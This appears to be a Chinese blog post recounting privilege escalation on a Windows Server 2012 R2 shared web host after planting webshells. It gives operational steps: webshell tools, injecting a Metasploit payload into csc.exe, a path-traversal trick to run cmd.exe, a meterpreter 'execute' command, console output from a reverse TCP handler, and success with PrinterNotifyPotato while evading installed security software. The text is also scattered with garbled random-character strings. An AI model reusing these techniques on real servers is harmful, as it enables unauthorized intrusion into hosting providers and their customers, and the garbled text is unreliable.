记一次虚拟主机提权

服务器：Microsoft Windows Server 2012 R2 Datacenter  IIS 8.5                           –                           

支持asp  aspx  php脚本

服务器有 安全狗  D盾  护卫神  （好像D盾没起作用   但是程序里确实在运行 有可能这个站点的应用池没有被D盾防护）            
            –            & Q  T* [9 K+ E5 i

‘ K8 h9 T1 K4 N- d, M1 W$ C
站点路径为：E:\zhosts\xxxx\web\   是一个虚拟主机            
/ Y, \8 w0 K* }  `+ o# E
用的是asp的马  aspx的小马一直报错  蚁剑连不上  然后用哥斯拉的马可以连接  不能执行命令
                          & @  Y/ |( ?0 U% D3 ]
首先用哥斯拉自带土豆提权   均失败             3 ]5 P+ Z( D$ Y
/ {1 g6 g0 @9 H* A# t, u6 R1 _
                                     – q& n: D% U8 d/ A8 t  p* L
本来想找个可写可执行路径传cmd  exp提权的  但是开始一直卡在这里 本来权限就特别小 然后c盘能写的目录特别少
最后发现只有c:\windows\temp\目录可写  但是这个目录没有执行权限  提示拒绝访问  

尝试大马这样执行 C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe\..\..\..\..\..\Windows\system32\cmd.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe\..\..\..\..\..\Windows\temp\cmd.exe也是拒绝访问             4 [& s7 j: V4 n4 o% e: c; A
                           –                           
然后想办法执行php copy命令吧cmd复制到c盘的C:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\这个目录  （大部分这个目录都可写可执行 但是这个机器没有权限写）

php的路径是c:\php\5.5\php.exe   尝试执行也是没有权限  然后找到winrar的目录  C:\Program Files\winrar\  连访问都不行   更别谈执行了  想解压到目录这条路也不行

想mysql  sqlserver找root sa也是行不通   一般虚拟主机权限设置的比较死  很难翻到数据库的配置文件
  l: g9 K9 N- B* B( r) V
于是想着上线msf或者cs   但是通过白名单csc和MSBuild.exe执行payload均失败               –     

                           –                     
1 n$ z0 d’ s1 n. A, a5 D3 v” i
然后想利用csc编译一个提权exp  好像提示有个库文件拒绝访问   后面我就没折腾这方面了  方便一点 直接利用哥斯拉上线

然而哥斯拉的shellcode加载模块 和 msf上线模块均利用失败  

猜测没有权限执行rundll32.exe  于换了另外w3wp.exe 注入  结果还是这样
                          9 l! J’ q$ n; s( ?; b0 ?” j
后面想着csc可以执行  于是注入csc程序  结果成功了
                          3 X7 h$ E” v$ E) T9 j
msf成功上线  但是权限很低  连getuid都执行不了  只能执行ps查看进程
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
                                     
想利用msf提权  能尝试的exp均提示没有权限+ l  
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

Started reverse TCP handler on 0.0.0.0:4444 ! f! u5 ?. g; \6 z
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.2 h
Exploit completed, but no session was created.. 
                                  

后面卡在这里卡了一会  突然想到能不能利用msf上传exp   本来最开始不管蚁剑或者哥斯拉都是上传失败的 提示没有权限
# _# Y9 ?9 T; i- C9 s2 v  G
但是利用msf成功上传 （应该是安全狗拦截进程导致最开始用蚁剑上传不了）                           –                           

用大马或者哥斯拉执行传上去的cmd结果还是提示拒绝访问                                    
                           –                            
用msf执行试试             , B+ u2 T. a; {‘ S9 e
execute -Hc -i -f “C:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\cmd.bak”                           –                            –

成功执行命令        

                
继续利用msf上传sweetpotato 和 PrinterNotifyPotato  其中sweetpotato提权失败  PrinterNotifyPotato提权成功8 
（我发现2012以上用PrinterNotifyPotato成功率是真的高）